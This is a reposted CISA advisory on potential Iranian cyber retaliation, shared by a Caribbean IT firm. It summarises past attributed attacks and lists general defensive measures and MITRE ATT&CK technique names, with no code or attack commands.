Alert (AA20-006A) Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad

Your Trusted Digital Transformation Partner

As we are all connected with Systems and Platforms to the world , we have to

appreciate the tools being used are not all specific and our data can be affected,

please see below the latest Cyber Alert and ensure you take the necessary precautions

to safeguard Data as we in the Caribbean are NOT immune to these worldwide

cyber threats.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is sharing the
following information with the cybersecurity community as a primer for
assisting in the protection of our Nation’s critical infrastructure in light of
the current tensions between the Islamic Republic of Iran and the United States
and Iran’s historic use of cyber offensive activities to retaliate against
perceived harm. Foremost, CISA recommends organizations take the following
actions:

  1. Adopt a state of heightened awareness. This includes
    minimizing coverage gaps in personnel availability, more consistently
    consuming relevant threat intelligence, and making sure emergency call
    trees are up to date.
  2. Increase organizational vigilance. Ensure
    security personnel are monitoring key internal security capabilities and
    that they know how to identify anomalous behavior. Flag any known Iranian
    indicators of compromise and tactics, techniques, and procedures (TTPs)
    for immediate response.
  3. Confirm reporting processes. Ensure
    personnel know how and when to report an incident.  
  4. Exercise organizational incident response plans. Ensure
    personnel are familiar with the key steps they need to take during an
    incident. Do they have the accesses they need? Do they know the processes?
    Are your various data sources logging as expected? Ensure personnel are
    positioned to act in a calm and unified manner.

Technical Details

Iranian Cyber Threat Profile

Iran has a history of leveraging asymmetric tactics to pursue national
interests beyond its conventional capabilities. More recently, its use of
offensive cyber operations is an extension of that doctrine. Iran has exercised
its increasingly sophisticated capabilities to suppress both social and
political perspectives deemed dangerous to Iran and to harm regional and
international opponents.

Iranian cyber threat actors have continuously improved their offensive
cyber capabilities. They continue to engage in more “conventional” activities
ranging from website defacement, distributed denial of service (DDoS) attacks,
and theft of personally identifiable information (PII), but they have also
demonstrated a willingness to push the boundaries of their activities, which
include destructive wiper malware and, potentially, cyber-enabled kinetic
attacks.

The U.S. intelligence community and various private sector threat
intelligence organizations have identified the Islamic Revolutionary Guard
Corps (IRGC) as a driving force behind Iranian state-sponsored
cyberattacks–either through contractors in the Iranian private sector or by the
IRGC itself.

Iranian Cyber Activity

According to open-source information, offensive cyber operations targeting
a variety of industries and organizations—including financial services, energy,
government facilities, chemical, healthcare, critical manufacturing,
communications, and the defense industrial base—have been attributed, or
allegedly attributed, to the Iranian government. The same reporting has
associated Iranian actors with a range of high-profile attacks, including the
following:

  • Late 2011 to Mid-2013 – DDoS Targeting U.S.
    Financial Sector:
    In response to this activity, in March 2016, the
    U.S. Department of Justice indicted seven Iranian actors employed by
    companies performing work on behalf of the IRGC for conducting DDoS
    attacks primarily targeting the public-facing websites of U.S. banks. The
    attacks prevented customers from accessing their accounts and cost the
    banks millions of dollars in remediation.   
  • August/September 2013 – Unauthorized Access to Dam
    in New York State:
    In response, in March 2016, the U.S. Department of
    Justice indicted one Iranian actor employed by a company performing work
    on behalf of the IRGC for illegally accessing the supervisory control and
    data acquisition (SCADA) systems of the Bowman Dam in Rye, New York. The
    access allowed the actor to obtain information regarding the status and
    operation of the dam.  
  • February 2014 – Sands Las Vegas Corporation Hacked: Cyber
    threat actors hacked into the Sands Las Vegas Corporation in Las Vegas,
    Nevada, and stole customer data, including credit card data, Social
    Security Numbers, and driver’s license numbers. According to a Bloomberg
    article from December 2014, the attack also involved a destructive
    portion, in which the Sands Las Vegas Corporation’s computer systems were
    wiped. In September 2015, the U.S. Director of National Intelligence
    identified the Iranian government as the perpetrator of the attack in a
    Statement for the Record to the House Permanent Select Committee on
    Intelligence.
  • 2013 to 2017 – Cyber Theft Campaign on Behalf of
    IRGC:
    In response, in March 2018, the U.S. Justice
    Department indicted nine Iranian actors associated with the Mabna
    Institute for conducting a massive cyber theft campaign containing dozens
    of individual incidents, including “many on behalf of the IRGC.” The
    thefts targeted academic and intellectual property data as well as email
    account credentials. According to the indictment, the campaign targeted
    “144 U.S. universities, 176 universities across 21 foreign countries, 47
    domestic and foreign private sector companies, the U.S. Department of
    Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the
    State of Indiana, the United Nations, and the United Nations Children’s
    Fund.”  

Mitigations

Recommended Actions

The following is a composite of actionable technical recommendations for IT
professionals and providers to reduce their overall vulnerability. These
recommendations are not exhaustive; rather they focus on the actions that will
likely have the highest return on investment. In general, CISA recommends two
courses of action in the face of potential threat from Iranian actors: 1)
vulnerability mitigation and 2) incident preparation.

  1. Disable all unnecessary ports and protocols. Review
    network security device logs and determine whether to shut off unnecessary
    ports and protocols. Monitor common ports and protocols for command and
    control activity.
  2. Enhance monitoring of network and email traffic. Review
    network signatures and indicators for focused operations activities,
    monitor for new phishing themes and adjust email rules accordingly, and
    follow best practices of restricting attachments via email or other
    mechanisms.  
  3. Patch externally facing equipment. Focus on
    patching critical and high vulnerabilities that allow for remote code
    execution or denial of service on externally facing equipment.
  4. Log and limit usage of PowerShell. Limit the
    usage of PowerShell to only users and accounts that need it, enable code
    signing of PowerShell scripts, and enable logging of all PowerShell
    commands.
  5. Ensure backups are up to date and
    stored in an easily retrievable location that is air-gapped from the
    organizational network.

Patterns of Publicly Known Iranian Advanced Persistent
Threats

The following mitigations and detection recommendations regarding publicly
known Iranian advanced persistent threat (APT) techniques are based on
the MITRE ATT&CK Framework.  

Iranian APT Techniques

Credential Dumping

Obfuscated Files or Information

Data Compressed

PowerShell

User Execution

Scripting

Registry Run
Keys/Startup Folder

Remote File Copy

Spearphishing

More Information – Mitigation
and Detection Techniques :

https://www.us-cert.gov/ncas/alerts/aa20-006a

Contact us at anytime  : www.cttl.net
| transform@cttl.net | 1-868-678-2885
(CTTL)

D.M.Ramdathsingh MSc, PgD – UK & Singapore
Chief Solutions Architect (CSA) – West Indies
Microsoft Certified Azure Security Engineer
Fortinet NSE 7 – Certified Network Security Architect
MILE2 – Certified Disaster / Penetration Testing Engineer
CTTL Ltd (CTTL) Ltd. (CTTL)
YOUR TRUSTED Digital TRANSFORMATION Partner


www.cttl.net